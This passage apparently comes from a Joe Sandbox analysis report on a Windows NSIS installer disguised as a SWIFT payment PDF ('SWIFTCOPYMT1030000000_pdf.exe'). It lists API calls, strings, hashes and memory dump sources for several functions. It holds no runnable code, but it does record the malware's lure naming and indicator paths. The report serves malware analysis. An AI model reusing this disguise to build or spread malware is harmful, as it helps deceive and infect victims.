                                      • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405329
                                      • SetClipboardData.USER32(00000001,00000000), ref: 00405334
                                      • CloseClipboard.USER32 ref: 0040533A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                      • String ID: Epicurize Setup: Installing${
                                      • API String ID: 4154960007-3782759227
                                      • Opcode ID: 6e337b6c722179ab30ba9d86fe019cb1769816a747b5174ef96660d98cd53fd9
                                      • Instruction ID: 5cc5a493c7826af022734a05619d12b61540e90d3b7798cd1ee4812e4cb533c1
                                      • Opcode Fuzzy Hash: 6e337b6c722179ab30ba9d86fe019cb1769816a747b5174ef96660d98cd53fd9
                                      • Instruction Fuzzy Hash: FDA16C70900208BFEB119F60DC85AAE7F79FB44355F00816AFA05BA1A1C7795E41DFA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      • Legend: Executed / Not Executed (graph image not reproduced; function entry block 402c33-402c81)
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00402C44
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,00000400), ref: 00402C60
                                        • Part of subcall function 00405825: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,80000000,00000003), ref: 00405829
                                        • Part of subcall function 00405825: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040584B
                                      • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,80000000,00000003), ref: 00402CAC
                                      Strings
                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E0B
                                      • soft, xrefs: 00402D21
                                      • Null, xrefs: 00402D2A
                                      • Error launching installer, xrefs: 00402C83
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                      • "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe", xrefs: 00402C33
                                      • Inst, xrefs: 00402D18
                                      • C:\Users\user\Desktop, xrefs: 00402C8E, 00402C93, 00402C99
                                      • C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe, xrefs: 00402C4A, 00402C59, 00402C6D, 00402C8D
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                      • String ID: "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                      • API String ID: 4283519449-2094975479
                                      • Opcode ID: 7e6bea62646216416da1489436a3b000af82ae672027ee591beada05dc0c487d
                                      • Instruction ID: 9cc68cb9a8033aa8cfa9fb84db7bfe2d2ab72e09e198f7c7f71ed61724ba903c
                                      • Opcode Fuzzy Hash: 7e6bea62646216416da1489436a3b000af82ae672027ee591beada05dc0c487d
                                      • Instruction Fuzzy Hash: 74510471D40204ABDB209F65DE89B6E7BA8EF40354F14403BFA04B62D1C7BC9E418BAD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      • Legend: Executed / Not Executed (graph image not reproduced; function entry block 405b99-405ba4)
                                      APIs
                                      • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,00404EBC,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000), ref: 00405C4A
                                      • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405CC5
                                      • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CD8
                                      • SHGetSpecialFolderLocation.SHELL32(?,0078F2A8), ref: 00405D14
                                      • SHGetPathFromIDListA.SHELL32(0078F2A8,Call), ref: 00405D22
                                      • CoTaskMemFree.OLE32(0078F2A8), ref: 00405D2D
                                      • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D4F
                                      • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,00404EBC,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000), ref: 00405DA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                      • API String ID: 900638850-1706705762
                                      • Opcode ID: 62d675d7ba4d7dd78eb3db4cf19b3261ec8909dcb0a8e4f793d05ab03d583e6e
                                      • Instruction ID: 050506686e60d08a76f5c318217997e75ce046d50ca6fca7f220fc6f31a13d77
                                      • Opcode Fuzzy Hash: 62d675d7ba4d7dd78eb3db4cf19b3261ec8909dcb0a8e4f793d05ab03d583e6e
                                      • Instruction Fuzzy Hash: 5E61F471A04A05AAEF115F24CC88BBF3BA9EF52314F14813BE941BA2D1D27C5981DF5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      • Legend: Executed / Not Executed (graph image not reproduced; function entry block 405454-40547a)
                                      APIs
                                      • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75EE3410,00000000), ref: 0040547D
                                      • lstrcatA.KERNEL32(0079FD00,\*.*,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,75EE3410,00000000), ref: 004054C5
                                      • lstrcatA.KERNEL32(?,00409014,?,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,75EE3410,00000000), ref: 004054E6
                                      • lstrlenA.KERNEL32(?,?,00409014,?,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,75EE3410,00000000), ref: 004054EC
                                      • FindFirstFileA.KERNELBASE(0079FD00,?,?,?,00409014,?,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,75EE3410,00000000), ref: 004054FD
                                      • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055AA
                                      • FindClose.KERNEL32(00000000), ref: 004055BB
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405462
                                      • "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe", xrefs: 00405454
                                      • \*.*, xrefs: 004054BF
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                      • String ID: "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                      • API String ID: 2035342205-3914693047
                                      • Opcode ID: a324933f258540b044efcfe334312fa73fb273d9979f8c99fd1672fc9b6fdbd7
                                      • Instruction ID: 6c887a6cd9596c43cc691a5f5e4ea67afdeb508a4c755cd09b57e0a75bcacbf5
                                      • Opcode Fuzzy Hash: a324933f258540b044efcfe334312fa73fb273d9979f8c99fd1672fc9b6fdbd7
                                      • Instruction Fuzzy Hash: 6F51C030800A04BACB21AB21CC45BBF7AB9DF42318F54817BF455B11D2D73C9A82DEAD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      • Legend: Executed / Not Executed (graph image not reproduced; function entry block 402036-40206f)
                                      APIs
                                      • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402089
                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,C:\Users\user\straamandens\noncosmic.lnk,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402143
                                      Strings
                                      • C:\Users\user\straamandens\noncosmic.lnk, xrefs: 0040212C, 00402136, 00402152
                                      • C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy, xrefs: 004020C1
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID: C:\Users\user\straamandens\noncosmic.lnk$C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy
                                      • API String ID: 123533781-2511247558
                                      • Opcode ID: 2e1ddb8780e1016394c9569cfde0881147111bc378c8489ba5f4aecf93cc6e5d
                                      • Instruction ID: b07af7920b8309ffd935e8952b71055f016d565fd75ec3e93ef818f940943bf4
                                      • Opcode Fuzzy Hash: 2e1ddb8780e1016394c9569cfde0881147111bc378c8489ba5f4aecf93cc6e5d
                                      • Instruction Fuzzy Hash: 91415F75A00205AFCB00DFA4CD88EAE7BB5EF49314F204169F905EB2D1CA79AD41CB55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindFirstFileA.KERNELBASE(?,007A0548,outvillain\faber.div,00405755,outvillain\faber.div,outvillain\faber.div,00000000,outvillain\faber.div,outvillain\faber.div,?,?,75EE3410,00405474,?,C:\Users\user\AppData\Local\Temp\,75EE3410), ref: 00405E86
                                      • FindClose.KERNEL32(00000000), ref: 00405E92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID: outvillain\faber.div
                                      • API String ID: 2295610775-1876387199
                                      • Opcode ID: cc838ac162cb5096740799fdca5271843f6408794e75c0bc12259f58485ee713
                                      • Instruction ID: e3a419463b19944544fc21c9ad6669fb55d517ae4bfd2eba5619c06405e9773a
                                      • Opcode Fuzzy Hash: cc838ac162cb5096740799fdca5271843f6408794e75c0bc12259f58485ee713
                                      • Instruction Fuzzy Hash: 6AD012319195205BC3406738AC0C89F7B69DB563317304B32B5BDF12E0C2389D628AE9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EB4
                                      • LoadLibraryA.KERNELBASE(?,?,?,00403134,00000008), ref: 00405EBF
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00405ED0
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: AddressHandleLibraryLoadModuleProc
                                      • String ID:
                                      • API String ID: 310444273-0
                                      • Opcode ID: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
                                      • Instruction ID: 2f3dee603afa82187d4e64c95529cacee06f2ec99598d25ed76f38a586475c1c
                                      • Opcode Fuzzy Hash: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
                                      • Instruction Fuzzy Hash: FBE08C32A04610ABC6209B209D0896B77ACEB88B41300497EF945F6151D734AC119BBA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Legend: Executed / Not Executed (the rendered graph is not reproduced here; its nodes are summarised below)
                                      • Function at 004039B4 (the dialog procedure handed to DialogBoxParamA in the entry for 00403622), basic blocks 004039B4 through 00403E5D; API calls on the graph: SetWindowPos, ShowWindow, DestroyWindow, SetWindowLongA, GetDlgItem, SendMessageA, IsWindowEnabled, SetClassLongA, KiUserCallbackDispatcher, EnableWindow, GetSystemMenu, EnableMenuItem, lstrlenA, SetWindowTextA, EndDialog, CreateDialogParamA, GetWindowRect, ScreenToClient; internal calls to 00403E87, 0040140B, 00403ED3, 00401389, 00403EEE, 00405B99, 00403EA9, 00403E60, 00403EBC and 00405B77
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039F0
                                      • ShowWindow.USER32(?), ref: 00403A0D
                                      • DestroyWindow.USER32 ref: 00403A21
                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A3D
                                      • GetDlgItem.USER32(?,?), ref: 00403A5E
                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A72
                                      • IsWindowEnabled.USER32(00000000), ref: 00403A79
                                      • GetDlgItem.USER32(?,00000001), ref: 00403B27
                                      • GetDlgItem.USER32(?,00000002), ref: 00403B31
                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403B4B
                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B9C
                                      • GetDlgItem.USER32(?,00000003), ref: 00403C42
                                      • ShowWindow.USER32(00000000,?), ref: 00403C63
                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403C75
                                      • EnableWindow.USER32(?,?), ref: 00403C90
                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA6
                                      • EnableMenuItem.USER32(00000000), ref: 00403CAD
                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CC5
                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD8
                                      • lstrlenA.KERNEL32(Epicurize Setup: Installing,?,Epicurize Setup: Installing,007A1F00), ref: 00403D01
                                      • SetWindowTextA.USER32(?,Epicurize Setup: Installing), ref: 00403D10
                                      • ShowWindow.USER32(?,0000000A), ref: 00403E44
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                      • String ID: Epicurize Setup: Installing
                                      • API String ID: 3282139019-1921106443
                                      • Opcode ID: 0c2cc5d366c93ad890157e52a419f655f0959c8ae2dd263d948fed7b28de4683
                                      • Instruction ID: 08d6703954b26bba67f61acca2d9aa754b0d4f7535d1ee947126766f28ce6238
                                      • Opcode Fuzzy Hash: 0c2cc5d366c93ad890157e52a419f655f0959c8ae2dd263d948fed7b28de4683
                                      • Instruction Fuzzy Hash: 42C1C231904200ABEB21AF25ED45E2B7EACF745706F04453EFA41B11E1C77DA982DB6E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Legend: Executed / Not Executed (the rendered graph is not reproduced here; its nodes are summarised below)
                                      • Function at 00403622 (registers the installer window class, creates the main window and runs the dialog procedure at 004039B4), basic blocks 00403622 through 004038E6; API calls on the graph: lstrcatA, LoadImageA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, lstrlenA, lstrcmpiA, GetFileAttributesA, ShowWindow, LoadLibraryA (twice), GetClassInfoA (twice), DialogBoxParamA; internal calls to 00405EA2, 00405AD5, 00405A5E, 004038E7, 00405712, 00405B99, 0040140B, 0040564F, 00405624, 00405B77, 0040566B, 00404F56 and 00403572
                                      APIs
                                        • Part of subcall function 00405EA2: GetModuleHandleA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EB4
                                        • Part of subcall function 00405EA2: LoadLibraryA.KERNELBASE(?,?,?,00403134,00000008), ref: 00405EBF
                                        • Part of subcall function 00405EA2: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED0
                                      • lstrcatA.KERNEL32(1033,Epicurize Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Epicurize Setup: Installing,00000000,00000006,C:\Users\user\AppData\Local\Temp\,75EE3410,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",00000000), ref: 0040369D
                                      • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\udskriftskartotek\chiromancy\refalling,1033,Epicurize Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Epicurize Setup: Installing,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 00403712
                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 00403725
                                      • GetFileAttributesA.KERNEL32(Call), ref: 00403730
                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\udskriftskartotek\chiromancy\refalling), ref: 00403779
                                        • Part of subcall function 00405AD5: wsprintfA.USER32 ref: 00405AE2
                                      • RegisterClassA.USER32(007A1EA0), ref: 004037B6
                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037CE
                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403803
                                      • ShowWindow.USER32(00000005,00000000), ref: 00403839
                                      • LoadLibraryA.KERNELBASE(RichEd20), ref: 0040384A
                                      • LoadLibraryA.KERNEL32(RichEd32), ref: 00403855
                                      • GetClassInfoA.USER32(00000000,RichEdit20A,007A1EA0), ref: 00403865
                                      • GetClassInfoA.USER32(00000000,RichEdit,007A1EA0), ref: 00403872
                                      • RegisterClassA.USER32(007A1EA0), ref: 0040387B
                                      • DialogBoxParamA.USER32(?,00000000,004039B4,00000000), ref: 0040389A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
